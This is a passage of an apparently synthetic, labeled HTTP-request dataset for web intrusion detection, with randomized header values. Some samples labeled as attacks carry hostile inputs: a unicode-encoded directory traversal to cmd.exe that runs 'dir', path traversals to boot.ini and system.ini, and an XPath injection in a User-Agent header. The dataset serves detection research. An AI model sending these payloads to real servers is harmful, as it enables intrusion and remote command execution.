Authorization: irmhdn qexot1s=gloi3uob
Range: 26855-,847-,-23
Referer: /Neumf/ydloesx/alesRisn/5ei6i9s.avi
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: iatr (t_u3im7G; e7W0S-3IF.; nYtP.0cz)
UA-CPU: StrongARM
UA-Disp: 384,417,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 402x308
Via: 0.9 227.78.146.56, esf0fi/3.2 34.164.171.154
Transfer-Encoding: compress
Upgrade: ca5umo/2.1, neaa/3.0
Warning: 813 217.129.214.222 "datp" 
X-Forwarded-For: 152.153.32.113
X-Serial-Number: 9495993319607061113
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

s5otiiei85=iiliE4meratan&fpptmnanjs=9010058&rephLest1cEL=s0tsLojes6&idLdJ=Yyollogemt&rnRI=r9g8&ey5soo1eebG=89714439&iao1oker9qeineT=7385419&Xxidvbscript=apemtgIdvCbnt&lelswno1=u &n0yvu=d3hariO&rfooh=588&nSMiSA@=e_sz9&em63dr5et=tqhavingpt>&onapplrtiat=h4222Tslunsirr6&EDPiERx=kb6YP6_ueu3

End - Id: 33785
Start - Id: 21332
class: Valid
GET /IerbyiaobtiNmeo/e6.htm?B0dets=t8M431rHPSN&ali=reSaikgysfq%25&fJjaoimn=iPYrRAZMzZ&geKtDrste=fgs8EWA HTTP/1.1
Host: www.sacfim.com
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: windows-1250
Accept-Encoding: 
Accept-Language: dedrI-lthddgtn;q=0.7
Cache-Control: no-transform
Client-ip: 77.98.59.51
Cookie: ttb0aolfgnh=uWzycjV4KFr;h0jwhp=lmo2o;ozehdaesmas=aent;ZZ4rn.tmpAwz_w=2803126
Cookie2: $Version="158"
Date: Mon, 20 Aug 07 13:43:54 GMT
ETag: "TOZ4-SOVy2SdlS1W"
Expect: 100-continue
From: rd1eArm@0dui5ee.biz
If-Modified-Since: Sun, 31 Oct 04 14:34:39 UTC
If-Unmodified-Since: Sun, 22 Jan 06 11:03:39 CET
If-Match: "zQB7qM3a4xWEPGRz-H"
If-None-Match: "mVTQ6MA.uaWKiHzxppnN"
If-Range: Sun, 06 May 07 03:19:38 CET
Max-Forwards: 78
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Basic YTlpNjpsb3JF
Authorization: duh0ts eiIeG77h=iwteaodn
Range: 7-27394,731-8,0552-
Referer: /aeerd.asp
TE: gzip;q=0.1,deflate;q=0.4,trailers
Trailer: Date
User-Agent: iSsrfeBslDvf7e0
UA-CPU: 68000
UA-Disp: 5168,522,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 040x521
Via: 9.7 www.sHU1eo.tiff
Transfer-Encoding: eazay; l8leac=hta3lett
Upgrade: ews/8.3
Warning: 447 www.bZeni6p.shtml "AoEoefv3atbtNidjY9e" 
X-Forwarded-For: 145.243.54.100
X-Serial-Number: 2418413
----: ------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 21332
Start - Id: 30951
class: Valid
GET /tunnd320B2tPoeas0e/lA7Wg/A563e5ddts5Rhtido/ay/4hpe7gTrSiEos/_insertWTglib/doinoanoiswnrO0o/boPFyWW0qv/ei5/neotitrcl1ra2.msf?tniBsaueOcrElr=Njeodioooa&KSX97nDV=6633825098&r7hNe1nCtE=oBIa_&wso9kvIo=69&atdhi3MthoTiur=e6itswherelog&5neee=sNiu3&eVxaboot.inif-o4=165422&bN8=40882023&lu=tK_sQy6&IaOErla5yEa=4&dmgc=ntn1roIt0es&hometczo=DrhservicesaeieOidil&e9eiirl6laejcy=iJg3TeXVbHFZ&8LUY=tOZ&nn39rR=174306 HTTP/1.1
Host: 51.234.169.190
Connection: close
Accept: */*;q=0.8
Accept-Charset: x-mac-arabic;q=0.0
Accept-Encoding: compress
Accept-Language: 9dod8t-at, gsaag-qderegbi, e6qws-Noeli;q=0.9, ohnpar-eead9enn;q=0.8
Cache-Control: max-stale
Client-ip: 169.130.225.221
Cookie: ajNbGX=a9;yhrhoufi=samohoaa4eiframeTh3;4weJtdEtuqq=2276638;toa5lYmm=1354106;ejyejclRokihis=745
Cookie2: $Version="61"
Date: Wed, 10 Sep 08 14:57:51 GMT
ETag: W/"jUO2qIgU5EJU.l5"
Expect: 100-continue
From: 2teoy3o@9tooecavin.be
If-Modified-Since: Fri, 11 Jul 08 10:55:06 GMT
If-Unmodified-Since: Tue, 29 May 07 09:41:26 GMT
If-Match: *
If-None-Match: "L_Nzf5EN4AdjnsyozB"
If-Range: Thu, 14 Apr 05 18:05:52 GMT
Max-Forwards: 3999
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: NTLM aWhhb25kZWVUYXNjaGlmaHRtUzhEdHVycjJzdG5vcHh3bmVob2hhOW1ScmRv
Authorization: Basic VXdmc0hzOnJ0NXM=
Range: -73
Referer: /wRclrA/sWhr/einqzk/yShtineh/yesqlyt.cfm
TE: deflate;q=0.5,deflate;q=0.4
Trailer: Range
User-Agent: eaagnbha/1.0.0.7
UA-CPU: PowerPC
UA-Disp: 0407,7003,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 454x053
Via: 0.1 www.4tneue.css, 2.0 www.eoec7uo.png:9307
Transfer-Encoding: gzip
Upgrade: ioa/5.5
Warning: 528 150.223.116.32 "eiib2tvfathrBNuolv" 
X-Forwarded-For: 34.220.136.254
X-Serial-Number: 063295011
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30951
Start - Id: 45658
class: PathTransversal
GET /log0QVjq@t6j94/D3tBxy1/dYcsycehN/oe1vnnNp3yejfesow3/nee13rh5tta/HxmailUZV8Aa92hhttpq/hatYomuertoomao/uV_WDXS/es/.1mUu/Yefromhavingg_QnetcatnIW/inQhiDJautoexec.gif?SmoMlFndtnu7=i%3A%5Cwindows%5Cboot.ini&loistSeee=um2er&wget21homef4P=me&ze3@o6j3xFQW=so8tenmict&otlllcd=slfe&lAhrnphsiPm=elinkts+ HTTP/1.0
Host: www.n8sae.cz
Connection: ae3i
Accept: image/*
Accept-Charset: koi8-r, koi8-r, utf-7;q=0.1
Accept-Encoding: compress, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 189.129.104.202
Cookie: soeatiyen3tf4m=);dsre1thtsoeSe=60792879;esasesdisiv=64672;ernueecodz0d=senn
Cookie2: $Version="46"
Date: Sat, 25 Sep 04 02:16:18 CET
ETag: W/"7x6zWK4vVBctAGUO"
Expect: 100-continue
From: waaAi@m8ebbshnen.org
If-Modified-Since: Tue, 04 Apr 06 23:02:03 GMT
If-Unmodified-Since: Fri, 24 Dec 04 16:52:50 GMT
If-Match: "w6At@Pqt6aQd3CsN6"
If-None-Match: "3BwnbX3K7XCmn.xh44"
If-Range: "PAA3Ys3l0qu2BAXi"
Max-Forwards: 81
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: NTLM V2FscmdtaW9sb2FkYWFoZ05FcnNlbkhqYXJwTG8zakEz
Authorization: NTLM ZWMzdGQ1Z2RnZTN1ZXdlbjBlMm90ZDc1eWhwZWh1Z24wZWVoT3RydDdl
Range: 92916-
Referer: /h3lsov/wqthGtod.php3
TE: trailers,chunked;q=0.0
Trailer: Cache-Control
User-Agent: Mozilla/7.8 (compatible; MSIE 6.5; Windows NT; aOfr)
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 822x7787
Via: HTTP/0.2 www.ctwsqwsd.html, 0.0 www.snibRf.png:0
Transfer-Encoding: gzip
Upgrade: xEsdx/9.1, igRd/3.6, uactmt/9.2, dwr7p/4.6
Warning: 878 36.126.187.244:5468 "Nwnmte1bhOIhe" 
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 4318148965798
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45658
Start - Id: 44066
class: OsCommanding
GET %u002e%u002e%u002f%u002e%u002e%u002fwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.ontwlur.net:80
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Tek-n;q=0.0, miwntie4-taN7ht2, trP2R-ulhs;q=0.2
Cache-Control: r='ien8yyle'
Client-ip: 185.93.146.213
Cookie: yroebaofl57s=r;access_log8Ktmpz8ELdA=]s A'6;e7iessel=8yye.yvjR36T;bU.mpga5=445662;8z=9e4e;h0zem8t4=td01
Cookie2: $Version="43"
Date: Fri, 09 Jul 04 20:17:14 CET
ETag: W/"8jJSMp1FL9CwR-.L4"
Expect: 100-continue
From: Llna9@hrnonxai.de
If-Modified-Since: Wed, 11 Oct 06 11:18:01 UTC
If-Unmodified-Since: Tue, 02 Mar 04 23:57:35 GMT
If-Match: "IwDXv31yqsmJflwHHA-G"
If-None-Match: "PpmnxhuvcL8N-J4"
If-Range: *
Max-Forwards: 5863
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM dDF0aE5xMXl5dGV0bng5c2wycmFvdGlhYWF3cjZSbWtubXV0bQ==
Authorization: Digest nonce
Range: 42-,-56317,-7
Referer: /eoawai6.mdb
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/1.5 (Machintosh; U; PPC 2.8; at-td; rv:5.8.9) Gecko/69223393
UA-CPU: PowerPC
UA-Disp: 6409,6413,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4959x090
Via: 8.6 www.cbtGUa.shtml
Transfer-Encoding: deflate
Upgrade: Rjwza/4.8, tein/1.3, crss4/4.1
Warning: 539 167.196.18.192 "faE4bxsefpe4nbstnL" 
X-Forwarded-For: 180.219.181.140
X-Serial-Number: 388289600968011
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44066
Start - Id: 35898
class: XPathInjection
POST /dehein/lvTpFNHLN_xJcac/pHJfopxD8JicZcKk/eciq/semn7gtLd/rqf/xNRT/cRCG/ns.js? HTTP/1.1
Content-Length: 29
Content-Language: tn,znttad
Content-Encoding: deflate
Content-Location: /eds4/i9dikuia/elTemem.js
Content-MD5: b2F2c2lod25yaWpvZmh0YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 13 Jun 04 15:57:42 UTC
Last-Modified: Sun, 06 Sep 09 07:58:55 CET
Host: 114.175.25.137
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: s0-l8m5e0yk, n-knttO, oTaormd-pza, oozee-h;q=0.1
Cache-Control: no-cache
Cookie2: $Version="1"
Date: Wed, 04 Aug 04 23:04:36 CET
If-Modified-Since: Mon, 13 Apr 09 10:01:17 GMT
If-Match: "TTPLZe4_fpwnfCvN9"
If-None-Match: "IGLZuYRpTBZMhMTc"
If-Range: *
Max-Forwards: 27
Referer: /mlaoi5m/leTid.swf
TE: chunked;q=0.8
User-Agent: 4     or neShE/e1d/rydet/child::node()[position()=726]     or 26=
Via: 0.3 56.118.107.78, HTTP/4.7 158.167.37.253
Transfer-Encoding: gzip
Warning: 185 95.174.113.134 "rtofrih1yr" "Tue, 17 Jul 07 19:10:56 GMT"

jsIr9i=iMvWY&nireuiz6hXMuc=91

End - Id: 35898
Start - Id: 34465
class: Valid
PUT /nx/o4fpesiCgkm.png? HTTP/1.1
Content-Length: 44
Content-Language: eedu
Content-Encoding: gzip
Content-Location: http://oni0tede.de/sasdiecc/n5tSRv.exe
Content-MD5: ZXRld29iaXphbHVyaWpnZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 22 Mar 06 23:34:32 CET
Last-Modified: Fri, 22 Jul 05 06:06:56 CET
Host: 220.106.47.244
Connection: close
Accept: video/*, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: F-eto;q=0.8, iHwtpcl-ee, tosyoee-phpyOe, qscn-s1of44
Cache-Control: max-stale=28
Client-ip: 54.105.137.188
Cookie: tNhc=l3gq3i
Cookie2: $Version="2"
Date: Mon, 02 Nov 09 06:28:57 GMT
ETag: W/"slpjt2qjOK@xLC3w0p"
Expect: 100-continue
From: nS63m@sntnm9.biz
If-Modified-Since: Mon, 22 Dec 08 13:01:31 UTC
If-Unmodified-Since: Mon, 12 May 08 20:52:50 UTC
If-Match: "F79GouyNpIAnWJO9e9"
If-None-Match: "y0WdjgjMU3hpAEWCJMe"
If-Range: Thu, 02 Aug 07 14:57:05 GMT
Max-Forwards: 0
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic Y3k0YWRhaGU6M2tlZQ==
Authorization: Digest qop=auth
Range: -297940,-256390
Referer: /npagms/rtlfra.nsf
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/7.7 (Windows; U; Windows NT 8.1; 5y-ia; rv:1.7.1) Gecko/81563428
UA-CPU: StrongARM
UA-Disp: 563,2938,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3150x9630
Via: nesi/5.2 www.nflpri.tiff, 8.9 70.124.32.151, 7.5 115.54.99.12
Transfer-Encoding: l8sgh4; Qteb=eeer
Upgrade: qznwTA/9.2, ouaxel/9.6, enlLl/2.8, tst8as/3.5
Warning: 583 www.eatteot.gif "mglnleiqoRbnha" "Sat, 21 Mar 09 19:35:43 GMT"
X-Forwarded-For: 229.28.6.246
X-Serial-Number: 2852435165133
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~

ghioeChssq=6asie49d s)mhm7au oc&6hcLOQRC=3

End - Id: 34465
Start - Id: 21706
class: Valid
GET /esoso/Exoreoak3eenduwgge/Itidl/teierh/Vy/nodk39F8ddk4z3-v/tx2n6tdMz7L-OVVa/hOQWKvCoR32wl/fRRZ14PTEgOrjD5NUy.php4?cailSadAqtElFux=osealo8sodl&AQA9netcattg-W=ot7owobm%27z&C5oHW=%40ner-&8sieit=tnad3a%25yet%2Fwse&4aesrcooreNgoun=706240&EcAWCtWZHL=1545770519&miyswb2MN4nhAss=a+LOn-%7C%7C%3F4e&adCzvenM=415709837&drL745da81inDR=eLfGTwTrRA7&x7xoei9egiLy=eetf%3An&hideeR=6329366&isezna=71113176&lstelnetkw=rsvn6ttinplGnnS&pnn0ut=%3Egdjeetcselect HTTP/1.1
Host: www.ltoaroaeh.st
Connection: Pahae5c
Accept: audio/*, video/quicktime;q=0.7
Accept-Charset: *;q=0.6
Accept-Encoding: identity, identity, compress;q=0.3, gzip;q=0.9
Accept-Language: *;q=0.0
Cache-Control: max-age=116
Client-ip: 118.181.213.172
Cookie: rca=bxUuneKMWN;u4RoasO2s4lwdo=943sztgwhryOimmneS;r7eeseotf=ttuej8sN:Ata6 Xhz;o2Wi09X=0;fnhYh5pusjrtgnd=0hlouytlug8acdeeXs;zmuaac3m=o-nop:aGbetweennten
Cookie2: $Version="160"
Date: Thu, 21 Dec 06 23:20:38 UTC
ETag: "b1FVgP0o9ojHwlZYty"
Expect: 100-continue
From: oteJo@zdjaie.biz
If-Modified-Since: Mon, 23 Aug 04 16:15:26 CET
If-Unmodified-Since: Mon, 30 Jan 06 22:19:35 GMT
If-Match: "oIeaA-brPYLJKnGTF"
If-None-Match: "yvUzx0CyRjLALal1"
If-Range: "1-jTM7s88ulx.Nq4"
Max-Forwards: 441
MIME-Version: 5.7
Pragma: ti=hhdo8eg
Proxy-Authorization: Basic N3NyZTp1bmUwdG8=
Authorization: Digest nonce
Range: 5266-9,06-522712,3-
Referer: http://piyL.ch/NlAb8om/wesresa/r5me9esw/eot3.jpg
TE: trailers,gzip;q=0.9,deflate
Trailer: Via
User-Agent: cto4 (p1g.st88j; rhhdUUx)
UA-CPU: Sparc
UA-Disp: 299,773,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 664x378
Via: 6.3 www.iidn4.htm
Transfer-Encoding: deflate
Upgrade: vyhes/0.6, uwb/8.0, iyeiah/2.8
Warning: 456 16.111.210.179 "htasayeJyno" "Fri, 12 Nov 04 12:32:53 CET"
X-Forwarded-For: 4.180.241.12
X-Serial-Number: 602294986
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21706
Start - Id: 15713
class: Valid
GET /eyDlv0e/esetnnaErndeceacl6/dSant18rIrh/snt2Chtne/a3osvltatn/Abiopflhtdl1Iath/iZTB6d/rJ0Zi/manfoHtr3t2etwinket.nsf? HTTP/1.0
Host: 192.99.208.169
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: min-fresh=38359
Client-ip: 21.70.72.139
Cookie: cehyuw2s8Enae=ooYa7Oe5broeh6n
Cookie2: $Version="216"
Date: Mon, 30 Mar 09 09:31:46 CET
ETag: "4HKQSqX5rLHIfLrMjJ"
Expect: 6eatinnv
From: jBhna@eoo43leE.com
If-Modified-Since: Fri, 25 Sep 09 20:15:36 CET
If-Unmodified-Since: Thu, 17 Dec 09 09:46:45 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 13 Jan 07 06:33:41 GMT
Max-Forwards: 953
MIME-Version: 3.1
Pragma: i=5av
Proxy-Authorization: NTLM ZWVvYnNqdDdpakllaDhodHN5ZWVZZUV2cnJlY3RvZWVlVHR0dHlkOGhmdGU=
Authorization: fupM ahigrje=sdnac
Range: 2-,-372
Referer: http://www.cnhLleoo.biz/he3r/9s13e/ihTeneru.jpeg
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/3.5 (compatible; irogmudajm; Solaris; ls7bd; fiNcah; iejgcei)
UA-CPU: MIPS
UA-Disp: 9331,266,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8122x873
Via: HTTP/7.6 www.eias.jpg:506
Transfer-Encoding: nueg
Upgrade: sli/9.1, Dh6/9.5, rWe/7.7, euhI/9.9
Warning: 069 112.185.107.39:350 "sYhsia1oihNa7t" 
X-Forwarded-For: 42.186.95.123
X-Serial-Number: 555023929683
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 15713
Start - Id: 45571
class: PathTransversal
GET /eb1pKws/sk3de5vtp/aorelSoeyru/dhz@HRXlRZkh7Yzu/fQS0fx@/sWagvca.tiff?51oen=zs&Ags=09899947&link4xMh5NV@t=6&nitveu1oeld=..........................WINNTsystem.ini&odiitwse=2092&rcptIltsizd=nOonuTob25Db HTTP/1.1
Host: 165.13.96.199
Connection: eob3bhh
Accept: video/mpeg;q=0.0, video/quicktime, application/rtf
Accept-Charset: x-mac-cyrillic, isiri-3342;q=0.5, ks_c_5601-1987;q=0.7, windows-1258
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 80.183.70.158
Cookie: 26ejuiimmAao=nRil'sp h%ud;AstdinallPwGinboot.iniEb=8Xip@exXl;qrpLOlhhee=taHY9YLf3t;anr6fp=08496;tiemrEBwoi=0826195030;t4elqo9=cef1nehnde8EU
Cookie2: $Version="99"
Date: Wed, 06 Jan 10 19:03:19 CET
ETag: "ppgx5jsPtD_MggU"
Expect: chatt5r=iate7c;ywiims=cuttsa
From: nnmuo@mspetgyxi.de
If-Modified-Since: Wed, 01 Dec 04 20:22:48 UTC
If-Unmodified-Since: Wed, 13 Oct 04 09:03:55 CET
If-Match: "X9aWOG2g7DkPiP2AKB_"
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 9.4
Pragma: bni0ia=czmr9c
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: b7an3 ismsIo=k0ei
Range: -2
Referer: http://eia3r.st/re07gino/idd2hc7/zelde2ok.png
TE: deflate,gzip;q=0.2,gzip;q=0.7
Trailer: Upgrade
User-Agent: einzpyx4Srx342nrius
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 952x387
Via: FTP/7.3 www.n8a3r.shtml, 4.3 9.26.45.107, 6.6 www.7tyrrR.jpg
Transfer-Encoding: compress
Upgrade: ggC/2.3, d2sU/5.6, shIm/3.2, ehs/6.3
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 58.229.7.205
X-Serial-Number: 86157391207979195
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45571
Start - Id: 34838
class: Valid
POST /a05yvU1dn@QO8Dl/sd79UjzeED0TaRpJp/kreon/tI0/ag/let0etu2/o.S4.FFIYWiZUr.dll? HTTP/1.0
Content-Length: 172
Content-Language: mtrnghV
Content-Encoding: gzip
Content-Location: http://dwds.net/gusde/ydEl/enahc0eh/xTutrJR.html
Content-MD5: dGR1RHRMbXVoaHNSTGdyaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 12 Mar 08 03:59:23 UTC
Last-Modified: Tue, 09 Nov 04 02:18:06 GMT
Host: 52.87.77.68
Connection: close
Accept: application/rtf;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: imHcwtNa-Hdet2, krEe-QgeA
Cache-Control: egaz='sjii'
Client-ip: 16.40.155.255
Cookie: dauayrrieedtoaa=awpv7Raq;eeentene6v=snl1waarl c1
Cookie2: $Version="92"
Date: Fri, 08 Oct 04 06:30:21 CET
ETag: W/"bqeMAefW9cPM72PS"
Expect: 100-continue
From: tsuvv@ylhi.cz
If-Modified-Since: Sun, 31 May 09 07:40:42 CET
If-Unmodified-Since: Sat, 17 Feb 07 17:07:37 GMT
If-Match: *
If-None-Match: *
If-Range: "eUYyuVxiao_YoNMXs23"
Max-Forwards: 99
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest response="56FFddd048DB85AF437AF9E1cF7F3afc"
Authorization: NTLM ZnhiODV0YWVwbElkdHdXdXpxOVJjQm5pMHRIaXR3ZXRlYXJsNG5hZWw=
Range: 623768-8270,-361888,-69728
Referer: /ehhwi.mpg
TE: trailers,trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.3 (Windows; U; Win98 4.3; at-nQ; rv:3.8.7) Gecko/25261103
UA-CPU: x86
UA-Disp: 9904,9912,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3246x5463
Via: FTP/2.8 80.252.43.46:1358
Transfer-Encoding: compress
Upgrade: xAqmi/0.2, o1hgea/4.1, rIdu/2.7, hori/6.4, 4dToph/6.1
Warning: 029 www.ldelcm.jpg "mt7u16ipeiusedskeu1" 
X-Forwarded-For: 77.62.199.33
X-Serial-Number: 11691729475
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

he=elbetween&jeSna9tsnes2a=tefaobE&8vmrlilEio=72583860&1eAnOoapoht=62935252&5dyecolnrpltrt=xhafvem&hH&yYauUoeM9pwtr=clinkt&fPhEG8Zv94=Ckvxn&baS=ghAyhtaccesdezciO'o|es

End - Id: 34838
Start - Id: 23445
class: Valid
GET /mr/2YV/nFsiv6oj.@ji0ijFwb/annroiEdjrhfwI/e8Dr2MBlL/tqkg/3QF..drf_YYMy@/aj5eT/telnetDGoO-CT/B2Gr8GWlogL-wA/iiisolej1p.html?oeN=ca%3F&vDoGpjZf2r=26&thtI=1212&qg0e=oPtseakeeteifiid4a&execDQmetaM9JvyP=62243&iM5C5FE2p=tr+sr&tp9fxe8ARb=yPc&vnracAgs=y8swru21XUc HTTP/1.0
Host: 157.2.174.100:412
Connection: itgdf
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: whayWnh-rTctbosq, sRgeR-ip;q=0.5, boe-5;q=0.2, nLeinrE-otnTE3ee;q=0.8
Cache-Control: no-transform
Client-ip: 116.67.243.172
Cookie: tz6tidge7n7=leF5ZWcyQ;8p6wgetK.g1T=%dropet5ogl;ioin=eaow1htC
Cookie2: $Version="004"
Date: Sun, 01 Mar 09 11:25:29 GMT
ETag: W/"aqOu1yoJkDVVl12BQsul"
Expect: 100-continue
From: tocfie@tta6.cz
If-Modified-Since: Thu, 18 Oct 07 15:38:18 GMT
If-Unmodified-Since: Mon, 28 May 07 06:01:23 CET
If-Match: *
If-None-Match: "tdyOZ8sfLEjovP77yyf"
If-Range: Sun, 13 Jul 08 16:32:51 GMT
Max-Forwards: 049
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Digest username="eru4bt"
Authorization: NTLM bHdobHRhQXhzMXNMWXJzdVJkR2VjYXNYSmRpdGl4c2g0ZA==
Range: 60-4,2-51827,267858-0573
Referer: /eseuie/opeSit/numsnsma/ojf2nAt/de2olsr.php4
TE: chunked
Trailer: Range
User-Agent: lafedRmTuyrsrg72
UA-CPU: StrongARM
UA-Disp: 2035,3360,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8587x9946
Via: HTTP/6.9 199.197.115.69, FTP/1.0 www.2eesd6i.css:745
Transfer-Encoding: gzip
Upgrade: ewen/9.0, yzsq/2.6, dee/3.9
Warning: 271 www.yytteo.gif "tthisNt" 
X-Forwarded-For: 46.39.164.236
X-Serial-Number: 15233843
----: ------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 23445
Start - Id: 33485
class: Valid
PUT /S0aaingia/imopz/iYwr9oIiZrw/wgoholtai8thh6golv.css? HTTP/1.0
Content-Length: 85
Content-Language: eim
Content-Encoding: deflate
Content-Location: http://www.8VpO3eo.gov/rsoho/snShht/eehid.pl
Content-MD5: c3hub2ptZW9od25hcmhscA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Jul 09 19:32:24 CET
Last-Modified: Sat, 26 Jan 08 23:58:37 CET
Host: 5.159.94.19
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: pjd9oytc-rnhl5cnb, jws-im9e9ug;q=0.2, piUst-8Ai, a-tiwr, wrthyE-re
Cache-Control: no-cache
Client-ip: 26.94.80.41
Cookie: oi=inlblmETbwb0;tterteceei7e3di=tscndjt;rbaewelmjtaprwr=4228;rnei4o=xhYyF55XlCbW;itxd60m7=ttx
Cookie2: $Version="81"
Date: Wed, 14 May 08 12:44:42 UTC
ETag: "-.7kydcl6DWysFJLW"
Expect: 100-continue
From: wdp08E@ecUow0letw.uk
If-Modified-Since: Sat, 19 Mar 05 19:21:34 CET
If-Unmodified-Since: Fri, 24 Apr 09 15:21:02 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5710
MIME-Version: 6.6
Pragma: 0nofmsy='te'
Proxy-Authorization: Basic b3dvYXg6ZXRkWnRscnM=
Authorization: Digest response="25f96a5A93c9FD43462C4CA3c6E4Feb9"
Range: -284
Referer: http://www.eelE6.uk/ohlbta0w/hdf8yd.mp3
TE: trailers,chunked
Trailer: Range
User-Agent: Mozilla/9.7 (X11; U; Linux i586 9.1; is-me; rv:6.9.1) Gecko/78095709
UA-CPU: MIPS
UA-Disp: 0089,4532,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 383x545
Via: HTTP/4.4 60.78.251.192:3
Transfer-Encoding: deflate
Upgrade: tbkjy/9.3, M3wzc8/5.0, too/6.5
Warning: 302 www.t0ae.jpg "cwhessipntmfenker8" 
X-Forwarded-For: 210.113.185.220
X-Serial-Number: 179106
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

emxkqmtl0nmhreu=17723072&DYobjectwgetnNHFt3b=no%t/nt&erohm=034827&CVzREO=soaRrgui

End - Id: 33485
Start - Id: 3920
class: Valid
PUT /redgxna/ee/l3wtKFi67/ewimht/2KsWwDF@@yXTMh4os2/mpYVULbtBi.mspx? HTTP/1.1
Content-Length: 250
Content-Language: enssnori
Content-Encoding: deflate
Content-Location: /Cphuhs/oEhcn/snlr.gif
Content-MD5: Y3RhaG41ZWVsbGxlZGVBMA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 09 Oct 06 02:02:46 UTC
Last-Modified: Wed, 22 Dec 04 14:06:23 CET
Host: 92.152.56.238:80
Connection: dRlO
Accept: */*;q=0.5
Accept-Charset: big5;q=0.2, iso-8859-1, windows-1255;q=0.4, cp-950, euc-cn;q=0.4
Accept-Encoding: 
Accept-Language: e-3ngxiit;q=0.0, o-a;q=0.2
Cache-Control: min-fresh=63224
Client-ip: 0.40.106.248
Cookie: htaccesStmpKYco=ylleeNuq;nmesrqnoxteeyoe=oQ6SH9
Cookie2: $Version="1"
Date: Sun, 24 Apr 05 11:54:42 CET
ETag: "rqhv63Ns9@LWgw.n9Rq"
Expect: 100-continue
From: DzeG@eoe4alJeo.net
If-Modified-Since: Thu, 30 Jun 05 19:27:27 CET
If-Unmodified-Since: Wed, 20 Sep 06 08:03:30 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6596
MIME-Version: 6.3
Pragma: ntftfa=0nne
Proxy-Authorization: sgsp amTcwnn=Vsriueni
Authorization: NTLM bXFqZWJtc250dElzTWFkY2hkZWNoU25hcVRydGloYTZ4aUFvc2FwRXNh
Range: 1-,-52,44-0
Referer: http://9liKeai.de/wcuoNt.asmx
TE: trailers
Trailer: Cache-Control
User-Agent: pcuhrmes (n.b_dj1; scWk6lU; hDGr-sSfJ; 90ffqtuNM)
UA-CPU: Sparc
UA-Disp: 905,734,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 698x5679
Via: esn9e/9.0 www.teyh.shtml:529, 0.1 44.121.111.116, ems/9.5 9.121.149.241
Transfer-Encoding: identity
